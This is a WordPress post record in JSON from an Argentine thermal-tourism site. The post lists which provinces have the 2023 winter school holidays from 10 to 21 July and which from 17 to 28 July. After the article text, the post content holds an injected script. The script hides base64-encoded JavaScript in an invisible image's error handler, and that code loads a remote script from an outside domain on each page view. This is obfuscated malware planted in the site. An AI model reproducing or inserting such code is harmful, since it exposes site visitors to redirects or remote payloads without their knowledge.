{"id":6988,"date":"2023-07-07T14:10:03","date_gmt":"2023-07-07T17:10:03","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=6988"},"modified":"2025-08-13T15:57:50","modified_gmt":"2025-08-13T18:57:50","slug":"vacaciones-de-invierno-2023-en-cada-provincia","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=6988","title":{"rendered":"Vacaciones de invierno 2023 en cada provincia"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#064569\"><em>Las vacaciones de invierno 2023 comenzar\u00e1n el pr\u00f3ximo lunes 10 de julio en algunas provincias argentinas, mientras que, en otras, arrancar\u00e1n el lunes 17 de julio<\/em><\/h3>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-large is-resized\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/07\/Termatalia-anuncio-TRIBUNA-TERMAL-2023-1466x1536.jpg.webp\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/07\/Termatalia-anuncio-TRIBUNA-TERMAL-2023-1466x1536.jpg-977x1024.webp\" alt=\"\" class=\"wp-image-6981\" width=\"249\" height=\"260\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/07\/Termatalia-anuncio-TRIBUNA-TERMAL-2023-1466x1536.jpg-977x1024.webp 977w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/07\/Termatalia-anuncio-TRIBUNA-TERMAL-2023-1466x1536.jpg-286x300.webp 286w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/07\/Termatalia-anuncio-TRIBUNA-TERMAL-2023-1466x1536.jpg-768x805.webp 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/07\/Termatalia-anuncio-TRIBUNA-TERMAL-2023-1466x1536.jpg-696x729.webp 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/07\/Termatalia-anuncio-TRIBUNA-TERMAL-2023-1466x1536.jpg-1068x1119.webp 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/07\/Termatalia-anuncio-TRIBUNA-TERMAL-2023-1466x1536.jpg-401x420.webp 401w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/07\/Termatalia-anuncio-TRIBUNA-TERMAL-2023-1466x1536.jpg-320x335.webp 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/07\/Termatalia-anuncio-TRIBUNA-TERMAL-2023-1466x1536.jpg-480x503.webp 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/07\/Termatalia-anuncio-TRIBUNA-TERMAL-2023-1466x1536.jpg-800x838.webp 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/07\/Termatalia-anuncio-TRIBUNA-TERMAL-2023-1466x1536.jpg.webp 1466w\" sizes=\"(max-width: 249px) 100vw, 249px\" \/><\/a><figcaption class=\"wp-element-caption\"><em><mark>Publicidad:<\/mark><\/em><\/figcaption><\/figure>\n<\/div>\n\n\n<p>Las\u00a0<strong>vacaciones de invierno 2023<\/strong>\u00a0o receso escolar ocupan dos semanas de julio. Es una tradici\u00f3n de a\u00f1os en Argentina y cada provincia tiene la potestad sobre su calendario.<\/p>\n\n\n\n<p>Como sucede cada a\u00f1o,&nbsp;<strong>el receso escolar de julio tendr\u00e1 dos per\u00edodos alternativos en todo el pa\u00eds:<\/strong>&nbsp;algunos tendr\u00e1n esta pausa del ciclo escolar entre el 10 y el 21 de julio, y otros del 17 al 28 de julio.<\/p>\n\n\n\n<p><strong>Este per\u00edodo de descanso implica vacaciones para los alumnos de todas las escuelas (p\u00fablicas y privadas), en todos sus niveles (inicial, primario y secundario) e incluye a sus docentes y el personal escolar.<\/strong>&nbsp;Cada provincia tambi\u00e9n determina las fechas para las mesas de examen para alumnos libres y equivalencias que, generalmente se dan al t\u00e9rmino de las vacaciones de invierno.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Qu\u00e9 provincias tienen vacaciones de invierno del 10 al 21 de julio<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Catamarca.<\/li>\n\n\n\n<li>C\u00f3rdoba.<\/li>\n\n\n\n<li>Corrientes.<\/li>\n\n\n\n<li>Entre R\u00edos.<\/li>\n\n\n\n<li>Formosa.<\/li>\n\n\n\n<li>La Pampa.<\/li>\n\n\n\n<li>La Rioja.<\/li>\n\n\n\n<li>Mendoza.<\/li>\n\n\n\n<li>Misiones.<\/li>\n\n\n\n<li>Neuqu\u00e9n.<\/li>\n\n\n\n<li>R\u00edo Negro.<\/li>\n\n\n\n<li>Salta.<\/li>\n\n\n\n<li>San Juan.<\/li>\n\n\n\n<li>San Luis.<\/li>\n\n\n\n<li>Tucum\u00e1n.<\/li>\n<\/ul>\n\n\n\n<p>Hay que tener en cuenta que el feriado del 9 de julio que celebra el D\u00eda de la Independencia Argentina cae en d\u00eda domingo y no se pasar\u00e1 al d\u00eda lunes. Sin embargo, para docentes, estudiantes y alumnos las vacaciones invernales comienzan de hecho el s\u00e1bado 8 de julio. De la misma manera, las provincias que comienzan su receso escolar el lunes 17 de julio, de hecho lo har\u00e1 el s\u00e1bado 15 de julio.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Qu\u00e9 provincias tienen vacaciones de invierno del 17 al 28 de julio<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>CABA.<\/li>\n\n\n\n<li>Provincia de Buenos Aires<\/li>\n\n\n\n<li>Chaco.<\/li>\n\n\n\n<li>Chubut.<\/li>\n\n\n\n<li>Santa Cruz.<\/li>\n\n\n\n<li>Jujuy.<\/li>\n\n\n\n<li>Santa Fe.<\/li>\n\n\n\n<li>Santiago del Estero.<\/li>\n\n\n\n<li>Tierra del Fuego.<\/li>\n<\/ul>\n\n\n\n<p><a rel=\"noreferrer noopener\" href=\"https:\/\/www.facebook.com\/dialog\/feed?app_id=161316767303985&amp;link=https%3A%2F%2Fwww.diariouno.com.ar%2Fsociedad%2Fcuando-empiezan-las-vacaciones-invierno-2023-cada-provincia-n1137416&amp;name=Cu%C3%A1ndo+empiezan+las+vacaciones+de+invierno+2023+en+cada+provincia&amp;caption=Vacaciones+de+invierno+2023&amp;description=Las+vacaciones+de+invierno+2023+comenzar%C3%A1n+el+pr%C3%B3ximo+lunes+10+de+julio+en+algunas+provincias+argentinas%2C+mientras+que%2C+en+otras%2C+arrancar%C3%A1n+el+lunes+17+de+julio&amp;redirect_uri=https%3A%2F%2Fwww.diariouno.com.ar%2Fsociedad%2Fcuando-empiezan-las-vacaciones-invierno-2023-cada-provincia-n1137416\" target=\"_blank\"><\/a><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Las vacaciones de invierno 2023 comenzar\u00e1n el pr\u00f3ximo lunes 10 de julio en algunas provincias argentinas, mientras que, en otras, arrancar\u00e1n el lunes 17 de julio Las\u00a0vacaciones de invierno 2023\u00a0o receso escolar ocupan dos semanas de julio. Es una tradici\u00f3n de a\u00f1os en Argentina y cada provincia tiene la potestad sobre su calendario. Como sucede [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":6989,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-6988","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-argentina"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6988","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6988"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6988\/revisions"}],"predecessor-version":[{"id":10365,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6988\/revisions\/10365"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/6989"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6988"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6988"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6988"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}